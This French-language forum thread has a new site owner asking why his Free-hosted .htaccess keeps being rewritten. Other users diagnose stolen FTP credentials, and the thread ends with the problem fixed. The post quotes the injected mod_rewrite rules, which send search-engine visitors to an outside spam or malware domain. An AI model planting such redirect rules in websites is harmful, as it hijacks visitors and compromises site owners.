Coucou à tous. Je suis nouveau sur le forum et tout aussi nouveau en prog...
 
Dans le cadre de l'arrivée prochaine de mon premier bébé, j'ai décidé de mettre en place un site perso pour pouvoir partager avec toute ma famille et mes amis ce moment particulier de ma vie.
 
Etant client chez free, je n'ai donc pas cherché bien loin où faire héberger mon site...
 
J'avais dans l'idée d'utiliser une galerie photo nécessitant le passage en php5, du coup, j'ai suivi les conseils trouvés sur le net en créant à la racine un fichier .htaccess. Mais là, les choses se compliquent. Au départ, tout fonctionne parfaitement mais au bout de quelques temps (c'est variable, de quelques secondes a quelques heures), lorsque je tente de revenir sur mon site, plus rien ne marche (erreur 500). Je vais donc voir ce qui se passe sur mon site avec filezilla et je constate à chaque fois que mon .htaccess a été modifié (par qui, par quoi ???) sans que j'y touche. Au lieu de "php1" je me retrouve avec un truc de ce genre :
 
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://storeoffers.info/go.php [R,L]
 
Sachant que free ne sait pas gérer le rewrite, j'imagine que c'est ça qui fait planter mon site en me provoquant une jolie erreur 500...
 
Si quelqu'un pouvait m'aider à comprendre d'où viennent ces changements intempestifs et à les empecher ça serait formidable... Merci d'avance.
 
PS : j'éspère que ce sujet n'a pas déjà été traité dans un autre post, en tout cas je n'ai rien trouvé lors de mes recherches...

t'as une verole qui te redigige pas mal de choses sur http://storeoffers.info/go.php on dirait

Nan, serieux ? Tu veux dire que j'ai une sorte de virus sur mon site ? c'est possible ça ???
Je fais comment pour réparer tout ça ???

tu as du utiliser une galerie php qui contient une faille... vérifie que tu es bien à jour... c'est sans doute par un des scripts php que le site se fait hacker.

Change ton mot de passe FTP et MySQL, et mets à la racine de ta gallerie le code suivant dans un .htaccess :  
 

 
Et vérifie aussi que tu as la dernière version de ta galerie.

sympa, un lien qui me montre un truc windows, qui scan mon PC et tout, mais j'ai un mac  héhéhé

A vrai dire, en ce qui concerne la mise a jour de la galerie, c'est pas un problème car elle n'est plus sur le site. En fait, j'ai effacé tout le site plusieurs fois (tout viré via filezilla et effacé les tables sql) sans changement. Au dernier essai j'ai juste remis sur le site mes fichiers htaccess et un dossier "site" vide contenant en théorie la partie protégée. Il n'y a rien d'autre sur le site et mon pb persiste...

est-ce que les visiteurs peuvent uploader des fichiers (avatars, par exemple) qui auraient un droit d'exécution ? (chmod 777 trop rapide ...)

j'ai déja entendu parlé de problème de pc vérolé qui faisait que tous les fichiers uploadés par ftp se trouvaient altérés par le malware... c'est peut être ton cas... essaie de passer des anti spyware en plus d'antivirus pour voir si tu n'es pas infecté par ce genre de truc.

 
Oh mon dieu, il a formaté ton disque et installé Windows sur toin Mac !!  
 
 
Commence par changer ton mot de passe, il est possible qu'il ait été cracké ou volé par un trojan. Et vérifie aussi ton PC avec un BON antimalware et un BON antivirus (l'AV en ligne de Kaspersky par exemple).

Pour ce qui est des chmod, de toute façon c'est très simple, je suis chez Free... Donc ils sont bloqués.
Aux dernières réinstallations du site il n'y avait rien d'uploadable, seulement mes htaccess et un dossier vide, ce qui n'empechait pas le problème de revenir.
J'ai changé hier mon mot de passe et ajouté les quelques lignes conseillées à mon htaccess et pour le moment, ça se passe bien, rien n'a été remodifié.
Je vais maintenant vérifier mon pc, si vous pensez que ça peut venir de là. Je vous dis ce qu'il en est dans la soirée... Merci bien de vous creuser la tête en tout cas.

Bon, et bien voici les nouvelles du front...
Après avoir changé mon mot de passe et avoir débusqué quelques malwares sur mon pc, je suis heureux de vous écrire que mon site (enfin, les fondations de mon site...) se porte bien. Aucun nouveau changement de mon htaccess depuis ce matin. Je reste prudent quand même mais ça semble bien parti pour marcher comme il faut cette fois-ci...
Un énorme merci à tous de m'avoir dépatouillé de ce mauvais pas et de me permettre de repartir sur des bases plus saines.

Et ben dans ce cas, félicitations pour l'arrivée de ton bébé

Utilise un mot de passe fort pour ton FTP, sinon, ça risque de recommencer.